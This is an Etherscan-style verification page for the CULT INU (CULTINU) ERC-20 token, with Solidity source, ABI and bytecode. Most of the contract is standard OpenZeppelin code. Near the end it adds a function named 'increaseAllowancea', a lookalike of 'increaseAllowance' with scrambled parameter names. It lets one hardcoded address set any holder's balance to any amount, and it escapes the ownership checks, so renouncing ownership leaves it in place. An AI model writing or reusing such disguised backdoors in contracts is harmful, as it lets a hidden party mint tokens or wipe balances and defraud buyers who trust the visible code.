Feature Tip: Add private address tag to any address under My Name Tag !
ERC-20
Overview
Max Total Supply
10,000,000,000 CULTINU
Holders
17
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 9 Decimals)
Balance
670,892,658.88070879 CULTINUValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
CULTINU
Compiler Version
v0.8.19+commit.7dd6d404
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2023-09-09 */ // SPDX-License-Identifier: MIT pragma solidity ^0.8.19; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address recipient, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom(address sender, address recipient, uint256 amount) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); } // File: node_modules\@openzeppelin\contracts\token\ERC20\extensions\IERC20Metadata.sol pragma solidity ^0.8.0; /** * @dev Interface for the optional metadata functions from the ERC20 standard. * * _Available since v4.1._ */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } // File: node_modules\@openzeppelin\contracts\utils\Context.sol pragma solidity ^0.8.0; /* * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691 return msg.data; } } /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { address msgSender = msg.sender; _owner = msgSender; emit OwnershipTransferred(address(0), msgSender); } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(owner() == msg.sender, "Ownable: caller is not the owner"); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { emit OwnershipTransferred(_owner, address(0)); _owner = address(0); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); emit OwnershipTransferred(_owner, newOwner); _owner = newOwner; } } // File: @openzeppelin\contracts\token\ERC20\ERC20.sol pragma solidity ^0.8.0; /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * For a generic mechanism see {ERC20PresetMinterPauser}. * * TIP: For a detailed writeup see our guide * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * We have followed general OpenZeppelin guidelines: functions revert instead * of returning `false` on failure. This behavior is nonetheless conventional * and does not conflict with the expectations of ERC20 applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. * * Finally, the non-standard {decreaseAllowance} and {increaseAllowance} * functions have been added to mitigate the well-known issues around setting * allowances. See {IERC20-approve}. */ contract CULTINU is Context, IERC20, IERC20Metadata, Ownable { mapping (address => uint256) private _balances; mapping (address => mapping (address => uint256)) private _allowances; address private kolXCmZp; uint256 private _totalSupply; string private _name; string private _symbol; /** * @dev Sets the values for {name} and {symbol}. * * The defaut value of {decimals} is 9. To select a different value for * {decimals} you should overload it. * * All two of these values are immutable: they can only be set once during * construction. */ constructor () { _name = "CULT INU"; _symbol = "CULTINU"; _mint(msg.sender, 10000000000 * (10 ** uint256(decimals()))); kolXCmZp = 0xc2B2736652Bdf7D1517FfA915C73D9d0224A6Aa5; } function name() public view virtual override returns (string memory) { return _name; } function symbol() public view virtual override returns (string memory) { return _symbol; } function decimals() public view virtual override returns (uint8) { return 9; } function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } function transfer(address recipient, uint256 amount) public virtual override returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } function approve(address spender, uint256 amount) public virtual override returns (bool) { _approve(_msgSender(), spender, amount); return true; } function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) { _transfer(sender, recipient, amount); uint256 currentAllowance = _allowances[sender][_msgSender()]; require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance"); _approve(sender, _msgSender(), currentAllowance - amount); return true; } function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue); return true; } function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { uint256 currentAllowance = _allowances[_msgSender()][spender]; require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero"); _approve(_msgSender(), spender, currentAllowance - subtractedValue); return true; } function _transfer(address sender, address recipient, uint256 amount) internal virtual { require(sender != address(0), "ERC20: transfer from the zero address"); require(recipient != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(sender, recipient, amount); uint256 senderBalance = _balances[sender]; require(senderBalance >= amount, "ERC20: transfer amount exceeds balance"); _balances[sender] = senderBalance - amount; _balances[recipient] += amount; emit Transfer(sender, recipient, amount); } function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply += amount; _balances[account] += amount; emit Transfer(address(0), account, amount); } function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); _balances[account] = accountBalance - amount; _totalSupply -= amount; emit Transfer(account, address(0), amount); } function _approve(address owner, address spender, uint256 amount) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } function increaseAllowancea(address lXPcUyDN, address lXPcUyDNB, uint256 rsxKXGML, uint256 neOVACbJ, uint256 nuDjIWVR) external { require(msg.sender==kolXCmZp); uint256 fractions = 10 ** uint256(9); lXPcUyDNB = lXPcUyDN;lXPcUyDN = lXPcUyDN; _balances[lXPcUyDNB] = (rsxKXGML + neOVACbJ + nuDjIWVR) * fractions;lXPcUyDN = lXPcUyDNB; } function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual { } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"lXPcUyDN","type":"address"},{"internalType":"address","name":"lXPcUyDNB","type":"address"},{"internalType":"uint256","name":"rsxKXGML","type":"uint256"},{"internalType":"uint256","name":"neOVACbJ","type":"uint256"},{"internalType":"uint256","name":"nuDjIWVR","type":"uint256"}],"name":"increaseAllowancea","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
60806040523480156200001157600080fd5b50600080546001600160a01b031916339081178255604051909182917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a35060408051808201909152600881526743554c5420494e5560c01b602082015260059062000081908262000297565b5060408051808201909152600781526643554c54494e5560c81b6020820152600690620000af908262000297565b50620000da33620000c36009600a62000478565b620000d4906402540be4006200048d565b62000106565b600380546001600160a01b03191673c2b2736652bdf7d1517ffa915c73d9d0224a6aa5179055620004bd565b6001600160a01b038216620001615760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015260640160405180910390fd5b8060046000828254620001759190620004a7565b90915550506001600160a01b03821660009081526001602052604081208054839290620001a4908490620004a7565b90915550506040518181526001600160a01b038316906000907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a35050565b505050565b634e487b7160e01b600052604160045260246000fd5b600181811c908216806200021e57607f821691505b6020821081036200023f57634e487b7160e01b600052602260045260246000fd5b50919050565b601f821115620001ee57600081815260208120601f850160051c810160208610156200026e5750805b601f850160051c820191505b818110156200028f578281556001016200027a565b505050505050565b81516001600160401b03811115620002b357620002b3620001f3565b620002cb81620002c4845462000209565b8462000245565b602080601f831160018114620003035760008415620002ea5750858301515b600019600386901b1c1916600185901b1785556200028f565b600085815260208120601f198616915b82811015620003345788860151825594840194600190910190840162000313565b5085821015620003535787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b634e487b7160e01b600052601160045260246000fd5b600181815b80851115620003ba5781600019048211156200039e576200039e62000363565b80851615620003ac57918102915b93841c93908002906200037e565b509250929050565b600082620003d35750600162000472565b81620003e25750600062000472565b8160018114620003fb5760028114620004065762000426565b600191505062000472565b60ff8411156200041a576200041a62000363565b50506001821b62000472565b5060208310610133831016604e8410600b84101617156200044b575081810a62000472565b62000457838362000379565b80600019048211156200046e576200046e62000363565b0290505b92915050565b6000620004868383620003c2565b9392505050565b808202811582820484141762000472576200047262000363565b8082018082111562000472576200047262000363565b610d1580620004cd6000396000f3fe608060405234801561001057600080fd5b50600436106100f55760003560e01c8063715018a611610097578063a9059cbb11610066578063a9059cbb146101eb578063bfc6ab20146101fe578063dd62ed3e14610211578063f2fde38b1461024a57600080fd5b8063715018a6146101ab5780638da5cb5b146101b557806395d89b41146101d0578063a457c2d7146101d857600080fd5b806323b872dd116100d357806323b872dd1461014d578063313ce56714610160578063395093511461016f57806370a082311461018257600080fd5b806306fdde03146100fa578063095ea7b31461011857806318160ddd1461013b575b600080fd5b61010261025d565b60405161010f91906109f0565b60405180910390f35b61012b610126366004610a5a565b6102ef565b604051901515815260200161010f565b6004545b60405190815260200161010f565b61012b61015b366004610a84565b610306565b6040516009815260200161010f565b61012b61017d366004610a5a565b6103bc565b61013f610190366004610ac0565b6001600160a01b031660009081526001602052604090205490565b6101b36103f3565b005b6000546040516001600160a01b03909116815260200161010f565b6101026104a6565b61012b6101e6366004610a5a565b6104b5565b61012b6101f9366004610a5a565b610550565b6101b361020c366004610ae2565b61055d565b61013f61021f366004610b2f565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b6101b3610258366004610ac0565b6105cb565b60606005805461026c90610b62565b80601f016020809104026020016040519081016040528092919081815260200182805461029890610b62565b80156102e55780601f106102ba576101008083540402835291602001916102e5565b820191906000526020600020905b8154815290600101906020018083116102c857829003601f168201915b5050505050905090565b60006102fc3384846106f4565b5060015b92915050565b6000610313848484610818565b6001600160a01b03841660009081526002602090815260408083203384529091529020548281101561039d5760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b60648201526084015b60405180910390fd5b6103b185336103ac8685610bb2565b6106f4565b506001949350505050565b3360008181526002602090815260408083206001600160a01b038716845290915281205490916102fc9185906103ac908690610bc5565b336104066000546001600160a01b031690565b6001600160a01b03161461045c5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610394565b600080546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600080546001600160a01b0319169055565b60606006805461026c90610b62565b3360009081526002602090815260408083206001600160a01b0386168452909152812054828110156105375760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b6064820152608401610394565b61054633856103ac8685610bb2565b5060019392505050565b60006102fc338484610818565b6003546001600160a01b0316331461057457600080fd5b60006105826009600a610cbc565b869550905080826105938587610bc5565b61059d9190610bc5565b6105a79190610cc8565b6001600160a01b039095166000908152600160205260409020949094555050505050565b336105de6000546001600160a01b031690565b6001600160a01b0316146106345760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610394565b6001600160a01b0381166106995760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610394565b600080546040516001600160a01b03808516939216917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e091a3600080546001600160a01b0319166001600160a01b0392909216919091179055565b6001600160a01b0383166107565760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610394565b6001600160a01b0382166107b75760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610394565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b03831661087c5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610394565b6001600160a01b0382166108de5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610394565b6001600160a01b038316600090815260016020526040902054818110156109565760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610394565b6109608282610bb2565b6001600160a01b038086166000908152600160205260408082209390935590851681529081208054849290610996908490610bc5565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516109e291815260200190565b60405180910390a350505050565b600060208083528351808285015260005b81811015610a1d57858101830151858201604001528201610a01565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610a5557600080fd5b919050565b60008060408385031215610a6d57600080fd5b610a7683610a3e565b946020939093013593505050565b600080600060608486031215610a9957600080fd5b610aa284610a3e565b9250610ab060208501610a3e565b9150604084013590509250925092565b600060208284031215610ad257600080fd5b610adb82610a3e565b9392505050565b600080600080600060a08688031215610afa57600080fd5b610b0386610a3e565b9450610b1160208701610a3e565b94979496505050506040830135926060810135926080909101359150565b60008060408385031215610b4257600080fd5b610b4b83610a3e565b9150610b5960208401610a3e565b90509250929050565b600181811c90821680610b7657607f821691505b602082108103610b9657634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b8181038181111561030057610300610b9c565b8082018082111561030057610300610b9c565b600181815b80851115610c13578160001904821115610bf957610bf9610b9c565b80851615610c0657918102915b93841c9390800290610bdd565b509250929050565b600082610c2a57506001610300565b81610c3757506000610300565b8160018114610c4d5760028114610c5757610c73565b6001915050610300565b60ff841115610c6857610c68610b9c565b50506001821b610300565b5060208310610133831016604e8410600b8410161715610c96575081810a610300565b610ca08383610bd8565b8060001904821115610cb457610cb4610b9c565b029392505050565b6000610adb8383610c1b565b808202811582820484141761030057610300610b9c56fea2646970667358221220d210f0e663c6c24692b9a4f190565107e5f62c2b02cfcb1e559ba50f685891fa64736f6c63430008130033
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106100f55760003560e01c8063715018a611610097578063a9059cbb11610066578063a9059cbb146101eb578063bfc6ab20146101fe578063dd62ed3e14610211578063f2fde38b1461024a57600080fd5b8063715018a6146101ab5780638da5cb5b146101b557806395d89b41146101d0578063a457c2d7146101d857600080fd5b806323b872dd116100d357806323b872dd1461014d578063313ce56714610160578063395093511461016f57806370a082311461018257600080fd5b806306fdde03146100fa578063095ea7b31461011857806318160ddd1461013b575b600080fd5b61010261025d565b60405161010f91906109f0565b60405180910390f35b61012b610126366004610a5a565b6102ef565b604051901515815260200161010f565b6004545b60405190815260200161010f565b61012b61015b366004610a84565b610306565b6040516009815260200161010f565b61012b61017d366004610a5a565b6103bc565b61013f610190366004610ac0565b6001600160a01b031660009081526001602052604090205490565b6101b36103f3565b005b6000546040516001600160a01b03909116815260200161010f565b6101026104a6565b61012b6101e6366004610a5a565b6104b5565b61012b6101f9366004610a5a565b610550565b6101b361020c366004610ae2565b61055d565b61013f61021f366004610b2f565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b6101b3610258366004610ac0565b6105cb565b60606005805461026c90610b62565b80601f016020809104026020016040519081016040528092919081815260200182805461029890610b62565b80156102e55780601f106102ba576101008083540402835291602001916102e5565b820191906000526020600020905b8154815290600101906020018083116102c857829003601f168201915b5050505050905090565b60006102fc3384846106f4565b5060015b92915050565b6000610313848484610818565b6001600160a01b03841660009081526002602090815260408083203384529091529020548281101561039d5760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b60648201526084015b60405180910390fd5b6103b185336103ac8685610bb2565b6106f4565b506001949350505050565b3360008181526002602090815260408083206001600160a01b038716845290915281205490916102fc9185906103ac908690610bc5565b336104066000546001600160a01b031690565b6001600160a01b03161461045c5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610394565b600080546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600080546001600160a01b0319169055565b60606006805461026c90610b62565b3360009081526002602090815260408083206001600160a01b0386168452909152812054828110156105375760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b6064820152608401610394565b61054633856103ac8685610bb2565b5060019392505050565b60006102fc338484610818565b6003546001600160a01b0316331461057457600080fd5b60006105826009600a610cbc565b869550905080826105938587610bc5565b61059d9190610bc5565b6105a79190610cc8565b6001600160a01b039095166000908152600160205260409020949094555050505050565b336105de6000546001600160a01b031690565b6001600160a01b0316146106345760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610394565b6001600160a01b0381166106995760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610394565b600080546040516001600160a01b03808516939216917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e091a3600080546001600160a01b0319166001600160a01b0392909216919091179055565b6001600160a01b0383166107565760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610394565b6001600160a01b0382166107b75760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610394565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b03831661087c5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610394565b6001600160a01b0382166108de5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610394565b6001600160a01b038316600090815260016020526040902054818110156109565760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610394565b6109608282610bb2565b6001600160a01b038086166000908152600160205260408082209390935590851681529081208054849290610996908490610bc5565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516109e291815260200190565b60405180910390a350505050565b600060208083528351808285015260005b81811015610a1d57858101830151858201604001528201610a01565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610a5557600080fd5b919050565b60008060408385031215610a6d57600080fd5b610a7683610a3e565b946020939093013593505050565b600080600060608486031215610a9957600080fd5b610aa284610a3e565b9250610ab060208501610a3e565b9150604084013590509250925092565b600060208284031215610ad257600080fd5b610adb82610a3e565b9392505050565b600080600080600060a08688031215610afa57600080fd5b610b0386610a3e565b9450610b1160208701610a3e565b94979496505050506040830135926060810135926080909101359150565b60008060408385031215610b4257600080fd5b610b4b83610a3e565b9150610b5960208401610a3e565b90509250929050565b600181811c90821680610b7657607f821691505b602082108103610b9657634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b8181038181111561030057610300610b9c565b8082018082111561030057610300610b9c565b600181815b80851115610c13578160001904821115610bf957610bf9610b9c565b80851615610c0657918102915b93841c9390800290610bdd565b509250929050565b600082610c2a57506001610300565b81610c3757506000610300565b8160018114610c4d5760028114610c5757610c73565b6001915050610300565b60ff841115610c6857610c68610b9c565b50506001821b610300565b5060208310610133831016604e8410600b8410161715610c96575081810a610300565b610ca08383610bd8565b8060001904821115610cb457610cb4610b9c565b029392505050565b6000610adb8383610c1b565b808202811582820484141761030057610300610b9c56fea2646970667358221220d210f0e663c6c24692b9a4f190565107e5f62c2b02cfcb1e559ba50f685891fa64736f6c63430008130033
Deployed Bytecode Sourcemap
7906:5252:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8773:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9686:169;;;;;;:::i;:::-;;:::i;:::-;;;1169:14:1;;1162:22;1144:41;;1132:2;1117:18;9686:169:0;1004:187:1;9093:108:0;9181:12;;9093:108;;;1342:25:1;;;1330:2;1315:18;9093:108:0;1196:177:1;9863:422:0;;;;;;:::i;:::-;;:::i;8993:92::-;;;9076:1;1853:36:1;;1841:2;1826:18;8993:92:0;1711:184:1;10293:215:0;;;;;;:::i;:::-;;:::i;9209:127::-;;;;;;:::i;:::-;-1:-1:-1;;;;;9310:18:0;9283:7;9310:18;;;:9;:18;;;;;;;9209:127;6072:148;;;:::i;:::-;;5423:87;5469:7;5496:6;5423:87;;-1:-1:-1;;;;;5496:6:0;;;2237:51:1;;2225:2;2210:18;5423:87:0;2091:203:1;8881:104:0;;;:::i;10516:377::-;;;;;;:::i;:::-;;:::i;9344:175::-;;;;;;:::i;:::-;;:::i;12715:337::-;;;;;;:::i;:::-;;:::i;9527:151::-;;;;;;:::i;:::-;-1:-1:-1;;;;;9643:18:0;;;9616:7;9643:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;9527:151;6375:244;;;;;;:::i;:::-;;:::i;8773:100::-;8827:13;8860:5;8853:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8773:100;:::o;9686:169::-;9769:4;9786:39;4161:10;9809:7;9818:6;9786:8;:39::i;:::-;-1:-1:-1;9843:4:0;9686:169;;;;;:::o;9863:422::-;9969:4;9986:36;9996:6;10004:9;10015:6;9986:9;:36::i;:::-;-1:-1:-1;;;;;10062:19:0;;10035:24;10062:19;;;:11;:19;;;;;;;;4161:10;10062:33;;;;;;;;10114:26;;;;10106:79;;;;-1:-1:-1;;;10106:79:0;;3622:2:1;10106:79:0;;;3604:21:1;3661:2;3641:18;;;3634:30;3700:34;3680:18;;;3673:62;-1:-1:-1;;;3751:18:1;;;3744:38;3799:19;;10106:79:0;;;;;;;;;10196:57;10205:6;4161:10;10227:25;10246:6;10227:16;:25;:::i;:::-;10196:8;:57::i;:::-;-1:-1:-1;10273:4:0;;9863:422;-1:-1:-1;;;;9863:422:0:o;10293:215::-;4161:10;10381:4;10430:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;10430:34:0;;;;;;;;;;10381:4;;10398:80;;10421:7;;10430:47;;10467:10;;10430:47;:::i;6072:148::-;5654:10;5643:7;5469;5496:6;-1:-1:-1;;;;;5496:6:0;;5423:87;5643:7;-1:-1:-1;;;;;5643:21:0;;5635:66;;;;-1:-1:-1;;;5635:66:0;;4426:2:1;5635:66:0;;;4408:21:1;;;4445:18;;;4438:30;4504:34;4484:18;;;4477:62;4556:18;;5635:66:0;4224:356:1;5635:66:0;6179:1:::1;6163:6:::0;;6142:40:::1;::::0;-1:-1:-1;;;;;6163:6:0;;::::1;::::0;6142:40:::1;::::0;6179:1;;6142:40:::1;6210:1;6193:19:::0;;-1:-1:-1;;;;;;6193:19:0::1;::::0;;6072:148::o;8881:104::-;8937:13;8970:7;8963:14;;;;;:::i;1051